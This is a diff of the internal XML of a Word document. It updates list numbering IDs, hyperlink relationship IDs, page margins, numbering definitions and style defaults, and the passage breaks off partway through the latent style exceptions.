@@ -10158,7 +10322,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1042"/>
+          <w:numId w:val="1046"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10168,7 +10332,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId162">
+      <w:hyperlink r:id="rId160">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10181,7 +10345,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1042"/>
+          <w:numId w:val="1046"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10191,7 +10355,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId163">
+      <w:hyperlink r:id="rId161">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10204,7 +10368,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1042"/>
+          <w:numId w:val="1046"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10214,7 +10378,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId164">
+      <w:hyperlink r:id="rId162">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10223,7 +10387,11 @@
         </w:r>
       </w:hyperlink>
     </w:p>
-    <w:sectPr/>
+    <w:sectPr>
+      <w:pgSz w:w="12240" w:h="15840"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:cols w:space="720"/>
+    </w:sectPr>
   </w:body>
 </w:document>
 </file>
@@ -10248,9 +10416,378 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:abstractNum w:abstractNumId="0">
-    <w:nsid w:val="e17f69ba"/>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="A89B76A8"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="BA38664C"/>
+    <w:lvl w:ilvl="0">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="480" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="1200" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1920" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2640" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="3360" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="4080" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4800" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="E17F69BA"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="64103C60"/>
+    <w:lvl w:ilvl="0">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="480" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="1200" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1920" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2640" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="3360" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="4080" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=" "/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4800" w:hanging="480"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF7C"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="853E2A1C"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF7D"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="047439CA"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF7E"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="5492F4A6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF7F"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="F13647D0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF80"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="2D903A40"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF81"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="99D62302"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF82"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="E2B6E1A8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF83"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="5E12543C"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF88"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="231EA5D8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="360"/>
+        </w:tabs>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="FFFFFF89"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="F80EE316"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="360"/>
+        </w:tabs>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="990">
+    <w:nsid w:val="707d28f3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
@@ -10330,89 +10867,8 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="990">
-    <w:nsid w:val="f0ef4933"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:lvl w:ilvl="0">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="480" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="720"/>
-        </w:tabs>
-        <w:ind w:left="1200" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="1440"/>
-        </w:tabs>
-        <w:ind w:left="1920" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2160"/>
-        </w:tabs>
-        <w:ind w:left="2640" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2880"/>
-        </w:tabs>
-        <w:ind w:left="3360" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="3600"/>
-        </w:tabs>
-        <w:ind w:left="4080" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=" "/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="4320"/>
-        </w:tabs>
-        <w:ind w:left="4800" w:hanging="480"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
   <w:abstractNum w:abstractNumId="991">
-    <w:nsid w:val="b0094ac0"/>
+    <w:nsid w:val="39c84b59"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
@@ -10493,7 +10949,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="99201">
-    <w:nsid w:val="2e3dc873"/>
+    <w:nsid w:val="ac8ebb6b"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
@@ -10581,7 +11037,40 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="1000">
     <w:abstractNumId w:val="990"/>
@@ -10754,30 +11243,626 @@
   <w:num w:numId="1042">
     <w:abstractNumId w:val="991"/>
   </w:num>
+  <w:num w:numId="1043">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1044">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1045">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
+  <w:num w:numId="1046">
+    <w:abstractNumId w:val="991"/>
+  </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="24"/>
-        <w:szCs w:val="24"/>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:sz w:val="21"/>
+        <w:szCs w:val="21"/>
         <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:spacing w:after="200"/>
+        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="276"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
+    <w:lsdException w:name="Normal" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
